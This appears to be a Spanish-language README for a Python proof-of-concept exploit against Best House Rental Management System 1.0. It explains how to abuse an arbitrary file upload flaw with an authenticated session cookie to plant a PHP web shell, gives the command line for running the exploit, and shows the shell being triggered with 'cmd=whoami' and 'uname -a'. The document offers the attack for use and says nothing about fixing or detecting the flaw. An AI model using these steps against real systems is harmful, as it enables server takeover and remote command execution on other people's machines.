
Script PoC en Python que explota una vulnerabilidad de carga de archivos arbitraria en Best House Rental Management System 1.0 para subir un web shell PHP y ejecutar comandos remotos.
Este script de Python demuestra cómo explotar la vulnerabilidad de carga de archivos arbitraria en Best House Rental Management System 1.0. La vulnerabilidad permite a un atacante cargar un archivo malicioso (como un shell web PHP) y ejecutar comandos arbitrarios en el servidor objetivo.
Clona el repositorio y navega al directorio:
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
Ejecuta el exploit con los siguientes parámetros:
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: La URL de la página de carga de archivos vulnerable (p. ej., http:///rental/admin_class.php?view=save_settings) file_upload_path: La ruta donde se almacenan los archivos cargados (p. ej., http:///path/to/uploaded/files) session_cookie: La cookie de sesión del usuario autenticado
Si tiene éxito, podrá ejecutar comandos en el servidor objetivo visitando:
bash
http://<file_upload_path>/shell.php?cmd=whoami
Pruébalo ejecutando comandos como whoami o uname -a.
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
Este código se publica bajo la licencia MIT.